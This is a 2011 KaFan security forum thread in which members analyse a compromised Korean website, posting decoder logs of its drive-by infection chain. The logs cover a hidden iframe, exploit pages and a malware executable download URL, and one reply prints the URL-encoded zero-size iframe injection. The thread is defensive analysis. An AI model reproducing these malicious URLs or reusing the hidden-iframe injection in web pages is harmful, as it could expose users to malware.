收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) hxxp://www.ht.co.kr/[挂马][已检测 by bc123]
12下一页
返回列表 发新帖
查看: 3004|回复: 18
收起左侧

[其它] hxxp://www.ht.co.kr/[挂马][已检测 by bc123]

[复制链接]
天使的愤怒
发表于 2011-5-1 15:45:43 | 显示全部楼层 |阅读模式
本帖最后由 jack1986001 于 2011-5-2 15:32 编辑

Log generated by 天使的愤怒 use mdecoder 0.67
[root]http://www.ht.co.kr/(秦怕力苞 - 崔霓茄 技惑栏肺狼 檬措)
    [script]http://www.ht.co.kr/flash_link.js
        [iframe]http://61.110.100.220/img/
            [iframe]http://takau.org/pita/INC/
                [exp]http://takau.org/pita/INC/x.htm(Exploit.Ie0dayCVE0806.a)
                    [virus]http://www.a-fish.com.tw/DB/wowlevel.exe
                [iframe]http://takau.org/pita/INC/h.asp
    [script]http://www.ht.co.kr/embedControl.js
    [script]http://www.ht.co.kr/js/prototype6.js
    [script]http://www.ht.co.kr/js/mainPopup.js
    [script]http://www.ht.co.kr/js/Haitai.js
    [script]http://www.ht.co.kr/seal.js
    [script]http://www.ht.co.kr/firstmonitor/stat_js.asp?sitenum=1

评分

参与人数 1经验 +1 收起 理由
jack1986001 + 1 感谢提醒~

查看全部评分

回复

举报

lyruyitong
发表于 2011-5-1 16:03:58 | 显示全部楼层
第二个小红伞报恶意软件其它未测试
回复

举报

a256886572008
发表于 2011-5-1 16:42:36 | 显示全部楼层
链接已经失效了
回复

举报

Hantaool
头像被屏蔽
发表于 2011-5-1 19:18:50 | 显示全部楼层
bc123 发表于 2011-5-1 15:45
Log generated by 天使的愤怒 use mdecoder 0.67
[root]http://www.ht.co.kr/(秦怕力苞 - 崔霓茄 技惑栏肺 ...

怎么会有相同的文章?一模一样的
http://log.mtian.net/?p=1507004
回复

举报

是昔流芳
发表于 2011-5-1 19:27:27 | 显示全部楼层
回复 4楼 Hantaool 的帖子

mdecoder的日志分享功能,不必多虑.
回复

举报

a45601236qq
发表于 2011-5-1 20:51:59 | 显示全部楼层
回复 1楼 bc123 的帖子

感謝bc123給我練習的機會,
剛剛用工具分析了一下,
照著自動化工具提示,找到了
%3Ciframe%20src%3Dhttp%3A%2F%2F%2536%2531%252E%2531%2531%2530%252E%2531%2530%2530%252E%2532%2532%2530%2F%2569%256D%2567%2F%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E
接著反彙編出來,得到http://61.110.100.220/img/
可是要在分析http://61.110.100.220/img/ 卻發現... 連不上去?
整個Orz..
回复

举报

klinxun
发表于 2011-5-2 01:32:54 | 显示全部楼层
趋势拦截……
回复

举报

IllusionWing
发表于 2011-5-2 01:56:42 | 显示全部楼层
回复 6楼 a45601236qq 的帖子

应该连接么啥问题。
回复

举报

IllusionWing
发表于 2011-5-2 01:56:58 | 显示全部楼层
本帖最后由 IllusionWing 于 2011-5-2 01:57 编辑

网马加密方式都不更新的么。。。

开始自动解析 - http://61.110.100.220/img/
L1 - http://%74%61%6B%61%75%2E%6F%72%67/%70%69%74%61/%49%4E%43/
L2 - http://%74%61%6B%61%75%2E%6F%72%67/%70%69%74%61/%49%4E%43/x.htm
自动解析 - Auto XOR - 高度可疑 - http://www.a-fish.com.tw/DB/wowlevel.exe
L2 - http://%74%61%6B%61%75%2E%6F%72%67/%70%69%74%61/%49%4E%43/h.asp

输出的对象 - http://www.a-fish.com.tw/DB/wowlevel.exe



此分析日志由 Illusion Wing 使用 Astox v1 Build 1300 在 2011年5月2日1时54分9秒 生成。

回复

举报

Hopesky
发表于 2011-5-2 11:27:23 | 显示全部楼层
关于:hxxp://takau.org/pita/INC/x.htm解密的日志(全体输出 -  3):

Level  1>hxxp://takau.org/pita/inc/x.htm
Level  2>hxxp://takau.org/pita/inc/unescape
Level  2>hxxp://www.a-fish.com.tw/DB/wowlevel.exe ●

By : Hopesky

密钥:BD
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 19:36 , Processed in 0.125426 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表